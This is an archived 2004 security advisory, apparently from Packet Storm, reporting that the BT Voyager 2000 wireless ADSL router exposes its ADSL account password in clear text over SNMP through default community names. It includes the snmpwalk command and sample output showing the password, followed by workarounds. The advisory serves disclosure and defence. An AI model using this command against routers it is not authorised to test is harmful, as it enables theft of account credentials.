what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

arhontWireless.txt

arhontWireless.txt
Posted Jun 25, 2004
Authored by Konstantin V. Gavrilenko | Site arhont.com

A clear text account password is obtainable using SNMP on the BT Voyager 2000 Wireless ADSL router.

tags | advisory
SHA-256 | 97dc052ac3e0b1453eaaea2d5bb1c4c31b7c9e9033008710e300211fe44a295c

arhontWireless.txt

Change Mirror Download
Arhont Ltd. - Information Security

Arhont Advisory by: Konstantin Gavrilenko (http://www.arhont.com)
Advisory: cleartext account password obtainable using SNMP
Class: design/configuration bug
Test platform: BT Voyager 2000 Wireless ADSL Router
Vendor Contact Date: 10/06/2004
PD* release date: 22/06/2004


DETAILS:

It is possible to obtain the ADSL account password from the wireless
side of the mentioned router. Provided the attacker can associate to the
router, he/she can grab SNMP strings from the router using default
public/private community name.

Furthermore, the information provided with public and private community
name are identical, differing only in that with private you can
obviously change the SNMP strings.



e.g.
root@abyrvalg:~# snmpwalk -v 1 -c public 192.168.1.1
SNMPv2-MIB::sysDescr.0 = STRING: BT Voyager 2000 Wireless ADSL Router
SNMPv2-MIB::sysObjectID.0 = OID: SNMPv2-SMI::enterprises.2535.111.6
SNMPv2-MIB::sysUpTime.0 = Timeticks: (260430184) 30 days, 1:02:01.84
[snip]
SNMPv2-SMI::transmission.23.2.3.1.5.5.1 = STRING:
"name.surname@btbroadband.com"
SNMPv2-SMI::transmission.23.2.3.1.5.6.1 = ""
SNMPv2-SMI::transmission.23.2.3.1.5.7.1 = ""
SNMPv2-SMI::transmission.23.2.3.1.5.8.1 = ""
SNMPv2-SMI::transmission.23.2.3.1.5.9.1 = ""
SNMPv2-SMI::transmission.23.2.3.1.5.10.1 = ""
SNMPv2-SMI::transmission.23.2.3.1.5.11.1 = ""
SNMPv2-SMI::transmission.23.2.3.1.5.12.1 = ""
SNMPv2-SMI::transmission.23.2.3.1.6.0.1 = ""
SNMPv2-SMI::transmission.23.2.3.1.6.0.2 = ""
SNMPv2-SMI::transmission.23.2.3.1.6.0.3 = ""
SNMPv2-SMI::transmission.23.2.3.1.6.0.4 = ""
SNMPv2-SMI::transmission.23.2.3.1.6.0.5 = ""
SNMPv2-SMI::transmission.23.2.3.1.6.0.6 = ""
SNMPv2-SMI::transmission.23.2.3.1.6.0.7 = ""
SNMPv2-SMI::transmission.23.2.3.1.6.0.8 = ""
SNMPv2-SMI::transmission.23.2.3.1.6.5.1 = STRING: "password"
[snip]



Risk Factor: High/Medium

Workarounds:
- Disallow anonymous access to the wireless router
- Change default SNMP community names
- Disable SNMP support



*According to the Arhont Ltd. policy, all of the found vulnerabilities
and security issues will be reported to the manufacturer 7 days before
releasing them to the public domains (such as CERT, BUGTRAQ, OSVDB).

If you would like to get more information about this issue, please do
not hesitate to contact Arhont team.




--
Respectfully,
Konstantin V. Gavrilenko

Arhont Ltd - Information Security

web: http://www.arhont.com
http://www.wi-foo.com
e-mail: k.gavrilenko@arhont.com

tel: +44 (0) 870 44 31337
fax: +44 (0) 117 969 0141

PGP: Key ID - 0x4F3608F7
PGP: Server - keyserver.pgp.com
Login or Register to add favorites

File Archive:

March 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Mar 1st
    16 Files
  • 2
    Mar 2nd
    0 Files
  • 3
    Mar 3rd
    0 Files
  • 4
    Mar 4th
    32 Files
  • 5
    Mar 5th
    28 Files
  • 6
    Mar 6th
    42 Files
  • 7
    Mar 7th
    17 Files
  • 8
    Mar 8th
    13 Files
  • 9
    Mar 9th
    0 Files
  • 10
    Mar 10th
    0 Files
  • 11
    Mar 11th
    15 Files
  • 12
    Mar 12th
    19 Files
  • 13
    Mar 13th
    21 Files
  • 14
    Mar 14th
    38 Files
  • 15
    Mar 15th
    15 Files
  • 16
    Mar 16th
    0 Files
  • 17
    Mar 17th
    0 Files
  • 18
    Mar 18th
    10 Files
  • 19
    Mar 19th
    32 Files
  • 20
    Mar 20th
    46 Files
  • 21
    Mar 21st
    16 Files
  • 22
    Mar 22nd
    13 Files
  • 23
    Mar 23rd
    0 Files
  • 24
    Mar 24th
    0 Files
  • 25
    Mar 25th
    12 Files
  • 26
    Mar 26th
    31 Files
  • 27
    Mar 27th
    19 Files
  • 28
    Mar 28th
    42 Files
  • 29
    Mar 29th
    0 Files
  • 30
    Mar 30th
    0 Files
  • 31
    Mar 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close